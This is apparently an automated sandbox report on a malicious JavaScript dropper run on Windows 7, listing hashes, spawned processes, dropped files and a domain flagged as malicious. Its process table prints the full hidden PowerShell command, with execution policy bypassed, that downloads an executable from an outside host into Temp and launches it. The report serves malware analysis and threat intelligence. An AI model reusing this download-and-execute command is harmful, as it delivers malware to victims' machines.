File name: | Éásp¡«¬ S. ÆÄé Åa«ñp¬G «G 11.12.2018.js |
Full analysis: | https://app.any.run/tasks/a733dbf4-d86a-4d6e-95b0-14e84c03bc61 |
Verdict: | Malicious activity |
Analysis date: | December 14, 2018, 15:08:34 |
OS: | Windows 7 Professional Service Pack 1 (build: 7601, 32 bit) |
Indicators: | |
MIME: | text/plain |
File info: | ASCII text, with very long lines, with no line terminators |
MD5: | DBADC05A3022D01B1C5C036CACB92D22 |
SHA1: | 718E87638BBE563153504217B035AB3268B32AF8 |
SHA256: | 7E11114A7B41B67F15BA59089F36627F9B260428DBDB218A56E8F6942E464AF5 |
SSDEEP: | 768:4y1qIFZoMtjpTComn8DbH8dLcZV6RR0VKxR41N9+L/TYMkzyh6KzQq:4y1q+RfEdIE |
PID | CMD | Path | Indicators | Parent process |
---|---|---|---|---|
2940 | "C:\Windows\System32\WScript.exe" "C:\Users\admin\AppData\Local\Temp\Éásp¡«¬ S. ÆÄé Åa«ñp¬G «G 11.12.2018.js" | C:\Windows\System32\WScript.exe | — | explorer.exe |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Microsoft ® Windows Based Script Host Exit code: 0 Version: 5.8.7600.16385 | ||||
4020 | "C:\Windows\System32\cmd.exe" /c powershell.exe -w hidden -noprofile -executionpolicy bypass (new-object system.net.webclient).downloadfile('http://chubanomania.icu/prima/spi.exe?rCuz','%Temp%ckZ89.ExE'); & start %tEMp%ckZ89.eXe | C:\Windows\System32\cmd.exe | — | WScript.exe |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows Command Processor Version: 6.1.7601.17514 (win7sp1_rtm.101119-1850) | ||||
2644 | powershell.exe -w hidden -noprofile -executionpolicy bypass (new-object system.net.webclient).downloadfile('http://chubanomania.icu/prima/spi.exe?rCuz','C:\Users\admin\AppData\Local\TempckZ89.ExE'); | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | — | cmd.exe |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows PowerShell Exit code: 1 Version: 6.1.7600.16385 (win7_rtm.090713-1255) |
PID | Process | Filename | Type | |
---|---|---|---|---|
2644 | powershell.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\417NH1IH6VBSTYR4Y4V4.temp | — | |
MD5:— | SHA256:— | |||
2644 | powershell.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms~RF13a694.TMP | binary | |
MD5:0C1DAA668BA499584B0AC7476368101E | SHA256:326CCA676EAA6C8A45F71B6239CC22D9F49085AB54229E1777D0E15C50EC13DA | |||
2644 | powershell.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms | binary | |
MD5:0C1DAA668BA499584B0AC7476368101E | SHA256:326CCA676EAA6C8A45F71B6239CC22D9F49085AB54229E1777D0E15C50EC13DA |
Domain | IP | Reputation |
---|---|---|
chubanomania.icu |
| malicious |